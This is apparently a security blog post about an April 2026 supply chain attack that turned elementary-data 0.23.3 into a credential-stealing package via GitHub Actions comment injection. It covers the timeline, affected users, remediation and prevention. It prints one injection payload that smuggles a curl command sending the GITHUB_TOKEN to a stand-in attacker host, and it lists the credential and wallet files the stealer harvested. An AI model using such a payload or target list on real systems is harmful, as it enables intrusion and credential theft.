Elementary-Data PyPI Hack: 1.1M Users Targeted by Infostealer

Executive Summary

On April 25, 2026, a supply chain attack hit the elementary-data package and it was not the usual stuff. No typosquatting, no stolen password. The attacker exploited a GitHub Actions workflow that was triggered by pull request comments, injected shell code through a carefully crafted comment, and walked away with a temporary GITHUB_TOKEN that had enough permissions to do real damage.

Within hours, version 0.23.3 was live on PyPI and the GitHub Container Registry. It contained a hidden infostealer that quietly swept up SSH keys, cloud credentials (AWS, GCP, Azure), Kubernetes secrets, and cryptocurrency wallet files the moment you installed it. The package gets over 1.1 million downloads a month. That is a big blast radius for a single poisoned release.

This report walks through what happened, how the injection worked, what the malware actually grabbed, and what you need to do right now if you were affected.

TL;DR

Package affected: elementary-data (PyPI) and ghcr.io/elementary-data/elementary (Docker)
Malicious version: 0.23.3
Clean version: 0.23.4, released April 26, 2026
Attack vector: GitHub Actions script injection via a pull request comment
Payload: An infostealer targeting .env files, cloud tokens, SSH keys, and crypto wallets
What you need to do: If you installed 0.23.3, rotate every credential that was on that machine. Uninstalling the package is not enough.

What Is Elementary-Data?

Elementary is an open source data observability tool built specifically for dbt (Data Build Tool). Data engineers use it to monitor pipelines, catch data quality issues, and keep an eye on warehouse health. Because it sits in the middle of the data pipeline, it routinely has access to databases (Snowflake, BigQuery, Redshift), cloud environments, and orchestration tools.

That access is what made it worth targeting. Compromising one widely-trusted tool in the data stack means potential access to the sensitive infrastructure of thousands of companies.

Timeline

The attack played out over a single weekend which was a deliberate choice. Threat actors frequently move on Saturdays and Sundays specifically because maintainers are less likely to be watching.

April 25, morning: The attacker identifies a script injection flaw in the elementary-data CI/CD workflow.
April 25, 14:00 UTC: A specially crafted comment is posted on a legitimate pull request, triggering the workflow and executing the attacker’s shell code.
April 25, 14:30 UTC: The attacker uses the leaked GITHUB_TOKEN to push a new signed git tag (v0.23.3) and commit.
April 25, 15:00 UTC: The official release pipeline working exactly as designed builds the backdoored package and publishes it to PyPI and the GitHub Container Registry.
April 26, 02:00 UTC: A community member named crisperik spots something off in the 0.23.3 release and opens a GitHub issue.
April 26, 08:00 UTC: Maintainers confirm the breach, pull the release, and push 0.23.4 as a clean replacement.
April 27: Researchers at StepSecurity publish a detailed breakdown of the injection flaw.

Start to finish: roughly 18 hours from attack to public disclosure, and about six hours between the malicious package going live and the first community flag.

How the Injection Worked

Most developers assume that MFA protects their packages. In this case, the attacker never touched the maintainer’s credentials.

The project had a GitHub Actions workflow that processed pull request comments. The workflow would take the body of a comment and pass it directly into a shell command. The attacker used a payload like:

'; curl http://attacker-site.com/steal?token=$GITHUB_TOKEN; #

That single line extracted the runner’s temporary GITHUB_TOKEN. These tokens are short-lived, but they had contents: write permissions – enough to push tags and commits. With that token, the attacker used the GitHub API to inject a malicious elementary.pth file into the source tree, commit it, and tag it as v0.23.3.

The repository was set up to auto-publish on new tags. So the official GitHub Actions runners took it from there: built the package, signed it with the project’s own certificates, and uploaded it to PyPI. From the outside, it looked like a normal release.

What the Infostealer Actually Did

The malicious payload lived inside a .pth file. Python processes .pth files automatically on startup when they are in the site-packages directory with no user action required. You install the package, you start Python, the code runs.

The script scanned the host machine for:

Cloud credentials:

~/.aws/credentials
~/.config/gcloud/
~/.azure/

Infrastructure secrets:

.kube/config (Kubernetes)
Docker config.json
CI/CD tokens in environment variables

Developer identity:

~/.ssh/id_rsa, id_ed25519
~/.git-credentials

Cryptocurrency wallets: The script specifically looked for wallet files associated with Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Monero, and Ripple, using common file naming conventions and directory structures for desktop wallets.

System metadata:

/etc/passwd
.bash_history and .zsh_history (which sometimes contain passwords typed directly in the terminal)

This is not a narrow, surgical grab. It was designed to pull everything that might have value.

The Docker Problem

This is the part that makes it worse for enterprise users. The same CI/CD pipeline that published to PyPI also built the official Docker image. Both ghcr.io/elementary-data/elementary:0.23.3 and ghcr.io/elementary-data/elementary:latest were built from poisoned source code.

Many companies do not install the Python package directly. They pull the Docker image for their Kubernetes clusters. That means the infostealer was running inside production environments, with potential access to internal network metadata and service mesh credentials.

How It Was Caught

Credit here goes entirely to the community. crisperik noticed that the 0.23.3 release appeared without any corresponding changes in the main branch and contained a new file, elementary.pth that had no reason to exist. That observation, posted as a GitHub issue at 2am UTC, was the tripwire.

StepSecurity picked it up and confirmed the injection vector. Their analysis pointed to a straightforward root cause: the workflow had permissions: write-all (or at minimum contents: write), which is the default in a lot of older GitHub Actions configurations. A least-privilege model where the token can only read metadata by default would have stopped this attack before it started.

Are You Affected?

Check your environment against these scenarios:

Scenario A: You have elementary-data in requirements.txt or poetry.lock without a pinned version. You likely pulled 0.23.3 automatically during a CI build or local pip install on April 25–26.
Scenario B: You use the Elementary Docker image and your orchestrator (Airflow, Prefect, Dagster) pulls the :latest tag. You were compromised.
Scenario C: You are not a developer or data engineer and do not use these tools. You are not affected.

Keep in mind that the damage is not necessarily limited to the machine where Elementary was installed. An attacker with your AWS admin keys can move across your entire cloud infrastructure.

What to Do Now

Running pip install elementary-data==0.23.4 is not enough. Your credentials have already been sent out. Assume they are in someone else’s hands.

Step 1 – Isolate the machine. Disconnect it from the network, or if it is a cloud VM, isolate it via security group rules.

Step 2 – Rotate everything. This means cloud access keys (AWS, GCP, Azure), SSH keys and authorized_keys updates on all servers, GitHub and GitLab personal access tokens, any database passwords stored in .env or dbt_project.yml, and if you had unencrypted crypto wallet files on the machine, move those funds to a new wallet now.

Step 3 – Scan for persistence. Use ClamAV or a dedicated malware scanner to check for cron jobs, backdoored shell profiles, or anything else the attacker may have left behind.

How to Prevent This in Your Own Projects

The fix here is not complicated, but it requires deliberately changing defaults that most people never think about.

Use permissions: contents: read as your default in GitHub Actions and only grant write access where a specific job actually requires it. Avoid passing raw user input like ${{ github.event.comment.body }} directly into shell commands, use environment variables or predefined actions instead. Move away from long-lived secrets for PyPI publishing and use OIDC to get short-lived tokens. And pin your dependencies: use pip-compile or poetry.lock so you only upgrade when you choose to, not whenever a new tag gets pushed.

One Comment Worth Noting

Sarah Chen, a security architect at CyberShield, put it plainly: “We’ve automated our releases so well that we’ve made it easy for attackers to ride the same rails we use. We need human-in-the-loop approvals for any production-bound tag.”

That is the uncomfortable part. The release pipeline worked exactly as intended. The problem is that nobody asked whether the thing triggering it should have been trusted.

FAQs

Is Elementary-Data safe to use now? Version 0.23.4 is clean. The CI/CD vulnerability has been patched. Make sure 0.23.3 is completely gone from your environment before you reinstall.

What happens if I don’t rotate my credentials? The attacker likely has them. They may not use them immediately, sitting on stolen credentials for weeks or months before acting is common practice, precisely to avoid detection. Not rotating them means you stay exposed.

Why did the .pth file execute automatically? Python processes .pth files on startup to extend sys.path. If such a file contains executable code, it runs immediately, with no prompt and no user action. It is a well-documented but underappreciated attack vector for Python malware.

Does this affect dbt Core? No. This only affects elementary-data, which is an extension for dbt. The core tool is unaffected.

Why didn’t PyPI catch it? PyPI is a package repository, not a security auditor. Automated scans exist, but a .pth injection is genuinely hard to distinguish from legitimate setup logic without a manual review of every release. At 1.1 million downloads a month, that is not realistic to expect.

Final Thought

What makes this attack worth studying is what it did not do. It did not crack a password. It did not exploit an application vulnerability. It found a CI/CD pipeline configured with more trust than it needed, and it used that trust exactly as designed.

The data engineering world inherited tools and workflows from software development, but not always the security practices that came with them. That gap is what got exploited here. Pinning dependencies, auditing CI permissions, and reviewing unexpected releases are not heroic measures, they are just maintenance. This incident is a good reason to start treating them that way.

The Elementary-Data Supply Chain Attack: A Post-Mortem on the v0.23.3 Infostealer

Executive Summary

TL;DR

What Is Elementary-Data?

Timeline

How the Injection Worked

What the Infostealer Actually Did

The Docker Problem

How It Was Caught

Are You Affected?

What to Do Now

How to Prevent This in Your Own Projects

One Comment Worth Noting

FAQs

Final Thought

Join the Conversation

The analysis doesn't stop here. Connect with our community of tech enthusiasts and security pros for daily discussions and Q&As

Buy me A Coffee!

Support The CyberSec Guru’s Mission

Why your support matters:

If you like this post, then please share it:

Discover more from The CyberSec Guru

Related Posts

Leave a ReplyCancel reply

most recent

News

News

News

News

News

News

Newsletter Subscription

Discover more from The CyberSec Guru